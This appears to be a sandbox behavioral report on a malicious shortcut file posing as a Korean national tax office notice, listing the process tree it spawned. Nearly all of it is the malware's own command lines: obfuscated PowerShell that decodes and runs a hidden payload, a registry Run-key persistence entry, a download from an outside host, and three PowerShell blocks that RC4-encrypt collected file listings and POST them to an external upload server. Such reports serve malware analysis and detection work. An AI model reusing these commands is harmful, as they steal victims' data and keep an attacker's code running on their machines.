
Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "KPlYGHDEJUSXbE" "C:\Users\test22\AppData\Local\Temp\국세청 종합소득세 해명자료 제출 안내.hwp.lnk"

    3052
    • cmd.exe "C:\Windows\system32\cmd.exe" /c TaQcWieyVzmoZZLspqMFAIGfQCwRStErTKXqjOUIVUdBSWTecLuDBhkQkmObtXUpETGqvVSKrVZpjsAFtSErgAVQbyuEuatgyCsPkuFuAOSqUKkeGChhVJvmZBPqQpKMJuGPzmEGJdFiABHzgthU||goto&p^ow^e^rs^he^l^l -windowstyle hidden $dedicte="$loped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bytes = for($i = 0; $i -lt $loped.Length;$i += 2){[System.Convert]::ToByte($loped.Substring($i, 2), 16);};$hoikd = [System.Text.Encoding]::ASCII.GetString($bytes);$hoikd = $hoikd -replace '-kZRMy-', '0x0002C186';$hoikd = $hoikd -replace '-uGsMNd-', '0x00003C22';$hoikd = $hoikd -replace '-dJDAHZm-', '0x00014000';$hoikd = $hoikd -replace '-xSCPeieP-', '0x00017C22';$hoikd = $hoikd -replace '-VMGeUPqTF-', '0x00014564';$hoikd = $hoikd -replace '-FyIkbVYRmv-', '20676.zip';Invoke-Expression $hoikd;";Invoke-Expression $dedicte;

      2188
      • powershell.exe powershell -windowstyle hidden $dedicte="$loped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bytes = for($i = 0; $i -lt $loped.Length;$i += 2){[System.Convert]::ToByte($loped.Substring($i, 2), 16);};$hoikd = [System.Text.Encoding]::ASCII.GetString($bytes);$hoikd = $hoikd -replace '-kZRMy-', '0x0002C186';$hoikd = $hoikd -replace '-uGsMNd-', '0x00003C22';$hoikd = $hoikd -replace '-dJDAHZm-', '0x00014000';$hoikd = $hoikd -replace '-xSCPeieP-', '0x00017C22';$hoikd = $hoikd -replace '-VMGeUPqTF-', '0x00014564';$hoikd = $hoikd -replace '-FyIkbVYRmv-', '20676.zip';Invoke-Expression $hoikd;";Invoke-Expression $dedicte;

        292
  • cmd.exe cmd /c C:\Users\Public\documents\05772046.bat

    2496
    • reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f

      2796
    • powershell.exe powershell -command "$url = 'https://bgfile.com/v2/read/get.php?vw=ln3&nv=xu6502';$VcuqEzofhsTtIrLF = 'C:\Users\Public\Documents\49996.zip';iwr -Uri $url -OutFile $VcuqEzofhsTtIrLF;"

      2956
    • nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

      572
    • powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$tDTVLEqumwVkQwuk='http://ttzcloud.com/upload.php';$fn='TEST22-PC_cuserdown.txt';$fp='C:\Users\Public\Documents\cuserdown.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($tDTVLEqumwVkQwuk);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

      2388
    • powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$tDTVLEqumwVkQwuk='http://ttzcloud.com/upload.php';$fn='TEST22-PC_cuserdocu.txt';$fp='C:\Users\Public\Documents\cuserdocu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($tDTVLEqumwVkQwuk);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

      2320
    • powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$tDTVLEqumwVkQwuk='http://ttzcloud.com/upload.php';$fn='TEST22-PC_cuserdesk.txt';$fp='C:\Users\Public\Documents\cuserdesk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($tDTVLEqumwVkQwuk);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

      1920
